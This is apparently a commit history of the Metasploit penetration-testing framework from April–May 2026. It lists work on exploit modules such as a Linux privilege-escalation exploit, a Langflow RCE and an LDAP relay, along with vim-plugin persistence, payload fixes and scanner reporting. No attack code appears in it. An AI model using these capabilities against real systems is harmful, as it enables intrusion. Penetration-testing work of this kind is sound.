Compare commits

...

2004 Commits

Author SHA1 Message Date
jenkins-metasploit 1ef3717849 automatic module_metadata_base.json update 2026-05-08 16:35:05 +00:00
Diego Ledda 5814c14781 Merge pull request #21206 from h00die/vim_plugin
vim plugin persistence
2026-05-08 12:24:22 -04:00
jenkins-metasploit 0037e42756 Bump version of framework to 6.4.133 2026-05-08 16:12:09 +00:00
adfoster-r7 33754fd7e8 Merge pull request #21424 from sjanusz-r7/fix-exec-payload-size-crash
Fix exec payload size crash
2026-05-08 17:05:58 +01:00
sjanusz-r7 79b0fd6edc Use rex-text hex string helper, fix module assembly null-terminated string usage
Use rex-text to_hex_cstring keyword arg
2026-05-08 16:41:39 +01:00
sjanusz-r7 8e432f69ca Bump rex-text 2026-05-08 16:41:35 +01:00
sjanusz-r7 d33c2f6600 Re-enabled payload cache size CI specs 2026-05-08 16:35:59 +01:00
Spencer McIntyre 50e5a85521 Merge pull request #21418 from kx7m2qd/fix-get-os-architecture
Fix get_os_architecture for Linux/BSD shell sessions
2026-05-08 09:33:45 -04:00
karan bea8eca0c6 Update rex-arch to 0.1.20 2026-05-08 09:09:10 -04:00
karan d1f9a0fd3b Fix get_os_architecture for Linux/BSD shell sessions
Uses Rex::Arch.from_uname to map uname -m output to ARCH_ constants
for non-meterpreter Linux/BSD shell sessions.

References rapid7/rex-arch#13
Fixes #21403
2026-05-08 09:09:10 -04:00
adfoster-r7 550a8cbdc3 Merge pull request #21425 from g0tmi1k/ftp_stat
ftp: Fix STAT due to unexpected response
2026-05-08 09:28:59 +01:00
g0t mi1k 89b10aa3fe ftp: Fix STAT due to unexpected response 2026-05-08 03:45:38 +01:00
h00die 4da2554a2a cleanup vim plugin 2026-05-07 20:06:32 -04:00
h00die fa69f45366 docs 2026-05-07 15:36:07 -04:00
h00die 5e39ced730 convert persistence mkdirs to lib function 2026-05-07 14:31:12 -04:00
h00die a394578488 vim plugin 2026-05-07 14:17:43 -04:00
Diego Ledda 963eaef422 Merge pull request #21411 from zeroSteiner/fix/linux-x64-exec
Escape strings embedded into the assembly of multiple payloads
2026-05-07 11:11:40 -04:00
jenkins-metasploit 2b42d779a1 automatic module_metadata_base.json update 2026-05-07 12:16:55 +00:00
adfoster-r7 817d3642c3 Merge pull request #21421 from adfoster-r7/update-validation-for-report-vuln
Update validation for report_vuln
2026-05-07 13:06:25 +01:00
adfoster-r7 9435bee69f Update validation for report_vuln 2026-05-07 11:55:39 +01:00
jenkins-metasploit dc1976058c automatic module_metadata_base.json update 2026-05-07 10:40:58 +00:00
adfoster-r7 97fba49fee Merge pull request #21314 from g0tmi1k/report_vuln
Fix #21296 - Add Msf::Auxiliary::Report
2026-05-07 11:28:49 +01:00
jenkins-metasploit 81a7646f0a automatic module_metadata_base.json update 2026-05-06 22:52:54 +00:00
adfoster-r7 a69e2ea707 Merge pull request #21413 from tart0ru5/patch-1
Improve failure condition checks
2026-05-06 23:42:37 +01:00
jenkins-metasploit 2be37dda84 automatic module_metadata_base.json update 2026-05-06 21:23:22 +00:00
Spencer McIntyre 98e588e066 Merge pull request #21410 from inkognitobo/fix/shiro-configurable-gadget-chain
Add configurable JAVA_GADGET_CHAIN option to Shiro module
2026-05-06 17:13:10 -04:00
g0t mi1k e30b6e81ad trace: Add missing report_vuln fields 2026-05-06 17:28:33 +01:00
jenkins-metasploit 38e6629582 automatic module_metadata_base.json update 2026-05-06 15:33:12 +00:00
adfoster-r7 26a7c5f417 Merge pull request #21415 from g0tmi1k/ftp_mixin
ftp: replace @banner_version with banner_version helper method
2026-05-06 16:22:38 +01:00
g0t mi1k b7e1d7ea77 ftp: replace @banner_version with banner_version helper method 2026-05-06 14:46:53 +01:00
jenkins-metasploit e3abb82e88 automatic module_metadata_base.json update 2026-05-06 13:28:27 +00:00
Christophe De La Fuente 696f530475 Merge pull request #21372 from g0tmi1k/ftp_anonymous
ftp_anonymous: Report service/vuln, store loot & update metadata
2026-05-06 15:16:23 +02:00
Spencer McIntyre 6e659caf23 Fix other instances of the same bug 2026-05-06 08:58:15 -04:00
g0t mi1k 48f178a93f ftp_anonymous: Feedback fixes 2026-05-06 13:44:43 +01:00
g0t mi1k ac20cf43e7 ftp_anonymous: Use FTP mixin 2026-05-06 13:32:13 +01:00
g0t mi1k 00c9e33a68 ftp_anonymous: report_service if missing banner 2026-05-06 13:32:13 +01:00
g0t mi1k 825e16bdc5 ftp_anonymous: report_host() when host up, service down 2026-05-06 13:32:13 +01:00
g0t mi1k d647f5f768 ftp_anonymous: Make sure to always disconnect 2026-05-06 13:32:13 +01:00
g0t mi1k 1b1edf938a ftp_anonymous: Clean up FTP banner 2026-05-06 13:32:13 +01:00
g0t mi1k 0f530ec016 ftp_anonymous: Make rubocop happy 2026-05-06 13:32:12 +01:00
g0t mi1k 51b4107dc7 ftp_anonymous: Update ruby code 2026-05-06 13:32:12 +01:00
g0t mi1k 0f696e572c ftp_anonymous: Add notes 2026-05-06 13:32:12 +01:00
g0t mi1k f6484ad724 ftp_anonymous: Store loot 2026-05-06 13:32:12 +01:00
g0t mi1k a0a774e724 ftp_anonymous: Improve logic 2026-05-06 13:32:12 +01:00
g0t mi1k efd59106a0 ftp_anonymous: Report vuln 2026-05-06 13:32:12 +01:00
g0t mi1k 3e320a9db3 ftp_anonymous: Report service 2026-05-06 13:32:12 +01:00
g0t mi1k 726d372257 ftp_anonymous: Remove line prefix 2026-05-06 13:32:12 +01:00
g0t mi1k 2c40a74483 ftp_anonymous: Add CVE 2026-05-06 13:32:12 +01:00
g0t mi1k b40623a0e1 ftp_anonymous: Move module 2026-05-06 13:32:12 +01:00
jenkins-metasploit 7888e29f2c automatic module_metadata_base.json update 2026-05-06 11:12:02 +00:00
adfoster-r7 95492d9680 Merge pull request #21380 from g0tmi1k/ftp_mixin
FTP mixin: Add report_service
2026-05-06 12:00:27 +01:00
g0t mi1k 815afec083 ftp: Add report_host 2026-05-06 10:46:01 +01:00
g0t mi1k 7d824835bc ftp: Add report_note 2026-05-06 10:46:01 +01:00
g0t mi1k 1ce7473b84 ftp: Add report_service 2026-05-06 10:45:55 +01:00
g0t mi1k 98f3bb1d84 ftp: Add banner_version 2026-05-06 10:38:30 +01:00
g0t mi1k 1a9e378dcf ftp: Fix verbose argument fallback 2026-05-06 10:36:59 +01:00
g0t mi1k addbc1b646 ftp: Remove dup IP:PORT in output 2026-05-06 10:36:59 +01:00
tart0ru5 fd6df3fb81 Improve failure condition checks
The prior check silently passes when `res` is `nil` (e.g. request
timeout / host unreachable), because `nil != 403` evaluates to `true`
2026-05-06 11:58:50 +08:00
Spencer McIntyre 9019e4c837 Escape the command in linux/x64/exec 2026-05-05 13:16:30 -04:00
inkognitobo c15d513766 Add configurable JAVA_GADGET_CHAIN option to Shiro module
The gadget chain was previously hardcoded to CommonsCollections2.
Add a JAVA_GADGET_CHAIN OptEnum so operators can select the chain
that matches the target's classpath without modifying the module.

Default remains CommonsCollections2 to preserve existing behaviour.
2026-05-05 17:55:20 +02:00
jenkins-metasploit bc5347f464 automatic module_metadata_base.json update
Command Shell Acceptance / cmd windows-2022 (push) Waiting to run
Command Shell Acceptance / linux ubuntu-latest (push) Waiting to run
Command Shell Acceptance / powershell windows-2025 (push) Waiting to run
Command Shell Acceptance / Generate report (push) Blocked by required conditions
LDAP Acceptance / LDAP Acceptance - ubuntu-latest - Ruby 3.2 (push) Waiting to run
LDAP Acceptance / Generate report (push) Blocked by required conditions
Lint / Lint msftidy (3.2) (push) Waiting to run
Meterpreter Acceptance / build (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2019-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / mcr.microsoft.com/mssql/server:2022-latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MSSQL Acceptance / Generate report (push) Blocked by required conditions
MySQL Acceptance / mariadb:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / mysql:latest - ubuntu-latest - Ruby 3.2 (push) Waiting to run
MySQL Acceptance / Generate report (push) Blocked by required conditions
Postgres Acceptance / postgres:16.2 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / postgres:9.4 - ubuntu-latest - Ruby 3.2 (push) Waiting to run
Postgres Acceptance / Generate report (push) Blocked by required conditions
SMB Acceptance / build (push) Waiting to run
Verify / Docker Build (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" MSF_FEATURE_DEFER_MODULE_LOADS=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.2 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.3 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1 (push) Waiting to run
Verify / ubuntu-latest - Ruby 3.4 - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" (push) Waiting to run
2026-05-04 13:49:03 +00:00
Diego Ledda edb6844c8f Merge pull request #21404 from zeroSteiner/feat/cve-2026-31431
Fix ARMLE exec and add to Copy Fail
2026-05-04 09:37:28 -04:00
jenkins-metasploit 909c8df2cf automatic module_metadata_base.json update 2026-05-01 13:50:15 +00:00
adfoster-r7 bbb2452063 Merge pull request #21342 from adfoster-r7/defer-loading-dependencies
Defer loading rex/metasm/octokit/etc dependencies
2026-05-01 14:37:27 +01:00
Spencer McIntyre 0c81638fff Fix ARMLE exec and add to Copy Fail 2026-04-30 20:03:04 -04:00
adfoster-r7 557ff0d068 Defer loading dependencies 2026-05-01 00:07:59 +01:00
jenkins-metasploit 5a2e7bb301 Bump version of framework to 6.4.132 2026-04-30 23:06:36 +00:00
jenkins-metasploit e8bb3cd5fb automatic module_metadata_base.json update 2026-04-30 22:30:05 +00:00
Brendan dc97d1e97e Merge pull request #21395 from zeroSteiner/feat/cve-2026-31431
Add exploit for CVE-2026-31431 (Copy Fail)
2026-04-30 17:19:08 -05:00
Spencer McIntyre 66995d3987 Only allow x64 and AARCH64 for now 2026-04-30 17:51:30 -04:00
Spencer McIntyre cdcdb5fe88 Normalize reported ARMLE architectures from Meterpreter 2026-04-30 17:09:33 -04:00
Spencer McIntyre bc0f7602c2 Only bind the socket once 2026-04-30 17:09:32 -04:00
Spencer McIntyre 0e02f10078 Add support for more architectures 2026-04-30 17:09:32 -04:00
Spencer McIntyre c0e5ceb531 Add an AARCH64 exec payload 2026-04-30 17:09:32 -04:00
Spencer McIntyre a0c5b9a6bc Merge pull request #21315 from cdelafuente-r7/mcp-server
MCP Server, specs and documentation
2026-04-30 16:33:18 -04:00
Spencer McIntyre e14ce079bb Appease rubocop 2026-04-30 15:18:18 -04:00
Spencer McIntyre 22a9dc4522 Add docs 2026-04-30 14:54:09 -04:00
Spencer McIntyre 55f9216698 Finish the exploit check and cleanup methods 2026-04-30 14:39:46 -04:00
jenkins-metasploit e2e210d038 automatic module_metadata_base.json update 2026-04-30 15:40:08 +00:00
cgranleese-r7 a2b57ae998 Merge pull request #21352 from adfoster-r7/improve-checkcode-messages-5
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 16:29:07 +01:00
Spencer McIntyre 12e08fb451 Add an expanded check 2026-04-30 10:54:17 -04:00
adfoster-r7 3bee31ff5e Update checkcodes and bug fixes 2026-04-30 15:42:10 +01:00
Spencer McIntyre d0a205f776 Add the initial LPE exploit 2026-04-30 09:53:35 -04:00
Spencer McIntyre 9f6349de7d Initial commit of updated stub
Stub has been updated to forward arguments to /bin/sh
2026-04-30 09:53:12 -04:00
jenkins-metasploit 5942122b9a automatic module_metadata_base.json update 2026-04-30 10:06:45 +00:00
cgranleese-r7 49ea1a3391 Merge pull request #21359 from adfoster-r7/improve-checkcode-messages-12
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:46:41 +01:00
cgranleese-r7 b3fbeced43 Merge pull request #21355 from adfoster-r7/improve-checkcode-messages-8
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:44:04 +01:00
cgranleese-r7 7b3aef8ede Merge pull request #21353 from adfoster-r7/improve-checkcode-messages-6
Add human-readable descriptions to CheckCode returns in modules
2026-04-30 10:43:21 +01:00
Christophe De La Fuente 6f3884e832 Redesign the logging capability using Rex::Logging and Rake middleware
- remove the original Logger
- use Rex::Logging with helper methods (dlog, ilog, etc.)
- add `sanitize` configuration option
- create Sanitizing, JsonFlatfile and JsonStream sinks for JSON logging format
- minor updates in apply_default (Loader)
- update the re-authentication logic (fix a specific usecase)
- add a Rack middleware that logs MCP HTTP request/response
- use Rex::Socket::Tcp instead of TcpSocket
- update the ensure_rpc_available for better validation
- use around_request instead of the deprecated SDK instrumentation for logging
- update and add specs
2026-04-30 11:10:09 +02:00
adfoster-r7 b59ced5057 Add human-readable descriptions to CheckCode returns in multi/http exploit modules (A-O) 2026-04-30 00:25:30 +01:00
adfoster-r7 0bf595c2ec Add human-readable descriptions to CheckCode returns in unix/webapp exploit modules 2026-04-30 00:16:04 +01:00
jenkins-metasploit 15a0f6eefd automatic module_metadata_base.json update 2026-04-29 19:30:36 +00:00
Spencer McIntyre 2634142f0d Merge pull request #21323 from jheysel-r7/feat/http_to_ldap
HTTP to LDAP Relay Module
2026-04-29 15:20:10 -04:00
Spencer McIntyre 2153daad7b Update the specs 2026-04-29 14:38:29 -04:00
Jack Heysel 4847d88441 HTTP to LDAP Relay Module and Supporting Libraries
Remove unnecessary code

Remove commented out code

Added documentation

Responded to Spencer and Copilot

Add anonymous identity check

Doc update

Warning surpression

Renamed ldap_client to relayed_connection

Comments
2026-04-29 07:48:42 -07:00
jenkins-metasploit 788aa2abc5 automatic module_metadata_base.json update 2026-04-29 13:18:45 +00:00
Spencer McIntyre 2cfdfcba60 Merge pull request #21392 from dwelch-r7/skip-windows-test-on-non-windows-system
skip Windows-specific tests on non-Windows platforms
2026-04-29 09:08:03 -04:00
dwelch-r7 bcae34ee4f Update test/modules/post/test/cmd_exec.rb
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-29 13:11:06 +01:00
Dean Welch 6df54a639e skip Windows-specific tests on non-Windows platforms 2026-04-29 13:05:17 +01:00
jenkins-metasploit 41a937c70c automatic module_metadata_base.json update 2026-04-27 11:20:38 +00:00
adfoster-r7 63f4f358c7 Merge pull request #21092 from sjanusz-r7/fix-macos-mingw-syscall_inject-compilation
Fix syscall_inject compilation errors on MacOS with MinGW 15
2026-04-27 12:09:19 +01:00
adfoster-r7 1e3727ba87 Add human-readable descriptions to CheckCode returns in remaining multi exploit modules 2026-04-25 10:52:11 +01:00
jenkins-metasploit e909b9218b Bump version of framework to 6.4.131 2026-04-25 08:54:14 +00:00
adfoster-r7 d121ff6a62 Merge pull request #21307 from adfoster-r7/improve-vuln-and-vuln-attempt-tracking
Improve vuln and vuln attempt tracking
2026-04-24 18:36:28 +01:00
adfoster-r7 e00515c172 Update logic for aux modules having called report_vuln already 2026-04-24 16:26:49 +01:00
adfoster-r7 3ecbadd032 Improve vuln and vuln attempt tracking 2026-04-24 16:26:49 +01:00
cgranleese-r7 7c4f15a024 Merge pull request #21354 from adfoster-r7/improve-checkcode-messages-7
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 16:13:19 +01:00
adfoster-r7 7479078bf1 Merge pull request #21356 from adfoster-r7/improve-checkcode-messages-9
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:45 +01:00
adfoster-r7 b09686efaf Merge pull request #21357 from adfoster-r7/improve-checkcode-messages-10
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:19 +01:00
adfoster-r7 b765db798e Merge pull request #21358 from adfoster-r7/improve-checkcode-messages-11
Add human-readable descriptions to CheckCode returns in modules
2026-04-24 15:25:00 +01:00
Simon Janusz aa14df9b6c Merge pull request #21368 from sjanusz-r7/change-php-payload-size
Change PHP payload die func message
2026-04-24 13:47:19 +01:00
adfoster-r7 1d1c284619 Merge pull request #21364 from sjanusz-r7/update-payload-cached-sizes-on-new-metadata-cache
Update payload cached sizes when creating new module metadata cache
2026-04-24 11:15:55 +01:00
sjanusz-r7 a153814b0f Change PHP payload die func message 2026-04-24 11:08:38 +01:00
jenkins-metasploit 17f7f4d718 Bump version of framework to 6.4.130 2026-04-23 15:02:38 +00:00
jenkins-metasploit 74468290c9 automatic module_metadata_base.json update 2026-04-23 14:54:17 +00:00
Spencer McIntyre 540139cd4a Merge pull request #21341 from g0tmi1k/smb
Fix various smb/samba issues
2026-04-23 10:45:58 -04:00
adfoster-r7 370c35c1e2 Add human-readable descriptions to CheckCode returns in windows/http exploit modules 2026-04-23 15:37:09 +01:00
jenkins-metasploit cb1cfbbe98 automatic module_metadata_base.json update 2026-04-23 14:21:28 +00:00
Brendan 2289fc07ce Merge pull request #21260 from Takahiro-Yoko/langflow_rce_cve_2026_27966
Add Langflow RCE module (CVE-2026-27966)
2026-04-23 09:12:12 -05:00
cgranleese-r7 107edff1cb Merge pull request #21278 from adfoster-r7/fix-msftidy-heading-in-codeblock-edgecase
Fix msftidy heading in codeblock edgecase
2026-04-23 13:23:55 +01:00
jenkins-metasploit 4521c9f3d3 automatic module_metadata_base.json update 2026-04-23 12:03:13 +00:00
g0t mi1k 76cae04e91 smb_login: Add report_service (regardless of RECORD_GUEST)
RECORD_GUEST = creds, not service
2026-04-23 12:59:19 +01:00
g0t mi1k 4f77df25ba smb_uninit_cred: Add report_service 2026-04-23 12:59:19 +01:00
g0t mi1k 792a4254ac smb_uninit_cred: Print correct port 2026-04-23 12:59:19 +01:00
g0t mi1k eb5b5a1277 smb_uninit_cred: Rex::Proto::DCERPC::Exceptions::Fault DCERPC FAULT => nca_op_rng_error 2026-04-23 12:59:18 +01:00
g0t mi1k 950fb9def6 smb_lookupsid: Hide table if results empty 2026-04-23 12:59:18 +01:00
g0t mi1k 2e58eb1207 psexec_loggedin_users: NoMethodError. undefined method `each_line' for false 2026-04-23 12:59:18 +01:00
g0t mi1k a173ea15fa smb_version: Remove duplicated report_service 2026-04-23 12:59:18 +01:00
g0t mi1k 3c1b245751 Fix #21339: NoMethodError undefined method `each' for an instance of String 2026-04-23 12:59:18 +01:00
g0t mi1k ca27731285 Fix #21338: NoMethodError undefined method `domain_handle' for nil 2026-04-23 12:59:18 +01:00
g0t mi1k 2d93669f56 Fix #21337: NoMethodError' 'undefined method `empty?' for nil 2026-04-23 12:59:18 +01:00
cgranleese-r7 1142d4e15d Merge pull request #21351 from adfoster-r7/improve-checkcode-messages-4
Add human-readable descriptions to CheckCode returns modules
2026-04-23 12:54:31 +01:00
adfoster-r7 96a37da14a Add human-readable descriptions to CheckCode returns in multi/http exploit modules (P-Z) 2026-04-23 12:26:32 +01:00
sjanusz-r7 f00bbe6451 Update payload cached sizes when creating new module metadata cache 2026-04-23 12:06:09 +01:00
jenkins-metasploit f1778187b8 automatic module_metadata_base.json update 2026-04-23 11:04:15 +00:00
cgranleese-r7 9ad8b7ac32 Merge pull request #21360 from adfoster-r7/improve-checkcode-messages-13
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:55:46 +01:00
jenkins-metasploit 8a5d7be47a automatic module_metadata_base.json update 2026-04-23 10:45:19 +00:00
cgranleese-r7 591dbdd821 Merge pull request #21350 from adfoster-r7/improve-checkcode-messages-3
Add human-readable descriptions to CheckCode returns in modules
2026-04-23 11:33:27 +01:00
adfoster-r7 c38f6b4858 Update checkcodes and bug fixes 2026-04-23 10:20:53 +01:00
adfoster-r7 3e61396ec2 Add human-readable descriptions to CheckCode returns in unix, freebsd, osx, and other exploit modules 2026-04-23 10:02:22 +01:00
jenkins-metasploit e5bdc50a4f automatic module_metadata_base.json update 2026-04-22 20:35:33 +00:00
Spencer McIntyre 44d60c0865 Merge pull request #21347 from g0tmi1k/smb_version
smb_version: Make SMBv1 happy
2026-04-22 16:27:08 -04:00
adfoster-r7 2ae936473e Add human-readable descriptions to CheckCode returns in remaining windows exploit modules 2026-04-22 18:44:55 +01:00
adfoster-r7 45bc95a876 Add human-readable descriptions to CheckCode returns in windows/local exploit modules 2026-04-22 18:43:59 +01:00
adfoster-r7 aaf536d189 Merge pull request #21361 from sjanusz-r7/payload-cache-size-changes
Comment out payload size cache tests
2026-04-22 17:13:23 +01:00
sjanusz-r7 8587d1c211 Skip payload cached size specs 2026-04-22 16:31:51 +01:00
adfoster-r7 05befe18b1 Add human-readable descriptions to CheckCode returns in linux/local exploit modules 2026-04-22 15:06:59 +01:00
jenkins-metasploit 7851cda71d automatic module_metadata_base.json update 2026-04-22 13:49:02 +00:00
cgranleese-r7 380911db97 Merge pull request #21349 from adfoster-r7/improve-checkcode-messages-2
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:32:05 +01:00
cgranleese-r7 de636c1457 Merge pull request #21348 from adfoster-r7/improve-checkcode-messages-1
Add human-readable descriptions to CheckCode returns in modules
2026-04-22 14:30:48 +01:00
adfoster-r7 f3b07d5a49 Add human-readable descriptions to CheckCode returns in auxiliary and post modules 2026-04-22 13:56:54 +01:00
adfoster-r7 2cbb3942b6 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (A-M) 2026-04-22 13:08:59 +01:00
g0t mi1k b7f136077e smb_version: Be more verbose - show smb1 if possible 2026-04-22 13:08:20 +01:00
g0t mi1k 0474c0ce24 smb_version: Add spacing between : 2026-04-22 13:08:20 +01:00
g0t mi1k 1d9c922488 Make smb_version happy with smbv1 2026-04-22 13:08:19 +01:00
cgranleese-r7 25d7c25ad8 Merge pull request #21346 from adfoster-r7/fix-false-positive-on-couchdb-enum-check
Fix false positive on couchdb enum check
2026-04-22 12:38:47 +01:00
adfoster-r7 19d333df13 Add human-readable descriptions to CheckCode returns in linux/http exploit modules (N-Z) 2026-04-22 11:55:15 +01:00
adfoster-r7 6e992aa6ed Fix false positive on couchdb enum check 2026-04-21 22:48:27 +01:00
jenkins-metasploit 9efc727462 automatic module_metadata_base.json update 2026-04-21 17:21:45 +00:00
Christophe De La Fuente 4c0f2c29bc Merge pull request #21019 from g0tmi1k/phpmyadmin_config 2026-04-21 19:13:04 +02:00
jenkins-metasploit 9692b8865f automatic module_metadata_base.json update 2026-04-21 17:08:11 +00:00
Spencer McIntyre 6a00ea38c6 Merge pull request #21306 from dledda-r7/feat/block-api-randomization
Block Api ROR13 IV randomization
2026-04-21 12:58:30 -04:00
Christophe De La Fuente 946d1a44b5 Fix Notes format (array) 2026-04-21 18:43:54 +02:00
jenkins-metasploit cca7166eb4 automatic module_metadata_base.json update 2026-04-21 15:05:42 +00:00
adfoster-r7 a918184416 Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support
Fix elasticsearch traversal check support
2026-04-21 15:57:26 +01:00
adfoster-r7 81f1a7c86a Fix elasticsearch traversal check support 2026-04-21 15:18:58 +01:00
adfoster-r7 97ab01cddd Merge pull request #21340 from dledda-r7/ci/disable-meterpreter-ci
Disable Windows Server 2022 CI
2026-04-21 15:01:35 +01:00
dledda-r7 b9573fa0ce ops(meterpreter): disable windows server 2022 build until 141_xp dependency is removed 2026-04-21 05:55:29 -04:00
dledda-r7 e40422845b fix: block_api.rb update 2026-04-21 05:43:34 -04:00
Spencer McIntyre 20065b3f3d Fix the include errors 2026-04-20 18:36:00 -04:00
Spencer McIntyre 44a45ffdbf Switch to Rex::Logging 2026-04-20 18:14:56 -04:00
Brendan 2dbfcfb918 Merge pull request #21232 from bcoles/file-find_writable_directories
Add find_writable_directories to Msf::Post::File
2026-04-20 16:33:53 -05:00
jenkins-metasploit ae63cb9b1d automatic module_metadata_base.json update 2026-04-20 20:41:14 +00:00
Brendan 6b57b4c66f Merge pull request #21256 from g0tmi1k/webdav
WebDAV improvements
2026-04-20 15:30:43 -05:00
Christophe De La Fuente 820e737024 Update from code review and some fixes
- add the `--mcp-transport` option
- prefix the MCP env. variable with `MSF_`
- move the code under `lib/msf/core/mcp/`
- move specs under `spec/lib/msf/core/mcp/`
- change the namespace from `MsfMcp` to `Msf::RPC`
- update the `lib/msf_autoload.rb` to exclude the mcp-related files
- add missing validation for the `mcp`, `rate_limit and `logging` sections in the config file
- remove duplicate error exception classes
- fix an error in the transformers related to the `created_at` field
- fix a small issue in the input validator when regex are used
- update the way error is reported for MCP Tools to be compatible with the changes in the new `mcp` gem
- update and add specs
2026-04-20 18:29:21 +02:00
adfoster-r7 bd2e11ad55 Merge pull request #21331 from bcoles/metadata-obj
Metadata::Obj: Deduplicate notes hash strings and memoize `Obj#path` to reduce retained memory in the module metadata cache
2026-04-20 16:55:33 +01:00
jenkins-metasploit 6acac8e120 automatic module_metadata_base.json update 2026-04-20 13:31:53 +00:00
cgranleese-r7 a53d0a027b Merge pull request #21332 from adfoster-r7/remove-false-positive-from-nodejs-pipelining-check
Remove false positive from nodejs pipelining check
2026-04-20 14:22:23 +01:00
Diego Ledda 46553b5984 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:47 +02:00
Diego Ledda 5622bd254b Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:19:07 +02:00
Diego Ledda 2c58825343 Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-20 15:18:54 +02:00
adfoster-r7 f060acd1e9 Remove false positive from nodejs pipelining check 2026-04-20 14:02:56 +01:00
bcoles 09bb98d13e Memoize Obj#path to avoid repeated File.join
The install_root path is immutable at runtime, so cache the computed
full path on first access instead of calling File.join on every call.
2026-04-20 22:19:55 +10:00
bcoles 76a7f61465 Deduplicate notes hash keys and values in metadata Obj
Notes keys ("Stability", "SideEffects", "Reliability") and values
("crash-safe", "ioc-in-logs", etc.) are repeated across thousands of
modules. Use frozen string dedup (-str) to share a single object per
unique string, reducing ~24K string allocations to ~185 shared objects.
2026-04-20 22:17:40 +10:00
adfoster-r7 e09a38085c Merge pull request #21330 from bcoles/modules-loader
Replace Pathname with string prefix removal in directory module loader
2026-04-20 11:45:33 +01:00
adfoster-r7 fe1aeb9279 Merge pull request #21329 from bcoles/modulemanager-cache
Simplify get_parent_path with rindex instead of split/join
2026-04-20 11:30:04 +01:00
adfoster-r7 9b985dc1ef Merge pull request #21327 from tair-m/master
Fix uninitialized constant HTTP::CookieJar by correcting load order in http_cookie_jar.rb
2026-04-20 10:39:02 +01:00
bcoles a8ccdfc1e4 Simplify get_parent_path with rindex instead of split/join
Replace File.join + String#split + array slice + Array#join with a
single String#rindex lookup. This avoids allocating intermediate arrays
and strings on every call (once per cached module during startup).
2026-04-20 18:22:53 +10:00
bcoles b1c4fd3f39 Replace Pathname with string prefix removal in directory module loader
Msf::Modules::Loader::Directory#each_module_reference_name created two
Pathname objects per module file and called relative_path_from to derive
the module reference name. With ~5,000 module files this produced
~170,000 calls to Pathname#chop_basename internally.

Since Rex::Find.find always yields absolute paths rooted at
full_entry_path, simple String#delete_prefix achieves the same result
without allocating Pathname objects.
2026-04-20 18:14:54 +10:00
Takah1ro f54374eaff Update exploit to improve stability 2026-04-18 12:56:53 +09:00
tair 4607741a16 Fix LoadError in http_cookie_jar for Ruby 3.3.0 2026-04-18 07:17:26 +05:00
g0t mi1k 94b4f577e0 WebDAV: MR feedback 2026-04-17 22:19:26 +01:00
jenkins-metasploit 046ba861b3 automatic module_metadata_base.json update 2026-04-17 16:21:38 +00:00
jheysel-r7 08f6dc20a5 Merge pull request #21122 from bootstrapbool/camaleon_cms_cve_2024_46987
Camaleon CMS CVE 2024 46987
2026-04-17 09:13:07 -07:00
Takah1ro a47234778c Increase WfsDelay 2026-04-17 23:54:43 +09:00
adfoster-r7 92af54c885 Merge pull request #21230 from bcoles/obj-dedup-cache
Reduce memory footprint of module metadata Obj instances
2026-04-17 12:33:23 +01:00
adfoster-r7 19112a0212 Merge pull request #21231 from bcoles/msf-module-cache
Module metadata: Fix stale module detection and add per-type metadata index
2026-04-17 11:25:44 +01:00
dledda-r7 679d2a9a4e feat: enhance block_api_iv handling with warnings and options for payload methods 2026-04-17 06:07:18 -04:00
bcoles 785307f55e Module metadata: Fix stale module detection and add per-type metadata index 2026-04-17 19:41:18 +10:00
dledda-r7 82c8028f1c refactor: remove redundant block_api_iv calls in payload generation methods 2026-04-17 05:38:19 -04:00
